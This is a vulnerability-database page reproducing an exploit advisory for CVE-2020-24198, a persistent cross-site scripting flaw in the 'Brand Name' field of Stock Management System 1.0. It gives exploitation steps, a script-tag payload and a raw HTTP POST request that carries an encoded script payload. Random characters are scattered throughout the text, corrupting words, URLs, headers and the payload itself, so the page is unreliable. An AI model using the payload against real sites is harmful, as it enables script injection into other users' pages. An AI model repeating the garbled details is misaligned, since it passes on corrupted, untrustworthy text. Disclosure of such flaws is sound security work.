Stock Management System 1.0 – Persistent Cross-Site Scripting (Brand Name) – CXSecurity.com

漏洞ID 2145289 漏洞类型
发布时间 2020-09-05 更新时间 2020-09-05
CVE编号 CVE-2020-24198

CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
漏洞来源
https://cx& o ) B w q -securM W z T . p Q mity.com/issue/WLB-2020090024
漏洞详情
漏洞细节尚未披露
漏洞EXP
# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Script2 S u @ $ing (Brand Name)
# Expl+ C 2 Z n xoit Author: Adeeb= + } . ` x Shah (@hyd3sec) & Bobby Cooke (boku)
# CVE ID: CVE-2020-24198
# Date: SeptemberZ  1 P w 4, 2020
# Vendor Homepage: https://www.sourcecodesB m v ) )ter.com/
# Softj o K ? O e 2 uware Link: https://www.sourcecodester.com/php/14q H * | 4 b366/stock-ma E G Anagement-system-php.html
# Ver? B & 3 / M * { tsion: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
# Vulnerability Details
# Description A persistent cross-site sI Y e |criC U jptig c L q &ng vulnerability exists within the d [  z @ b % c'Brand Name' parameter in the edit brand function.
# This example allowM   =s a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the BraN A end Name value expected.
#Steps:
1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploi9 C  $ Y z 4 [ %t)
2. Click "Brand"
3. Click "Action" in any brand namB | r %e row
4. Click Edit
5. In "Brand Name" field enter XSS <script>alert(1)</script>a - 8 - I o
6. Click save changes
7. Any page on the webapp expecting that 'Brand Name' will trigger the XSS.
POST /stock/php_action/editBran~ ) y Ed.php HTTP/1.1
Host: 192.168.222.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=k K h ! g a @0.01
Accept-Language: enE 5 G-US,en;q=0.5
Accept-EncodingE _ ! ~ :: gzip, deflate
Referer: http://192.168.222.132/stock/brand.php
Content-Type: application/x-S 5 } Qwww-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHtB r dtpRequest
Content-Length: 78
DNT: 1
Connection: clW x .ose
Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8
editBrandName=%3Cscript%3EaI 9 P X r o :lert(%22hyd3sB | ! ec%22)%3C%2Fscript%3E&editBrandStatus=1&brandId=14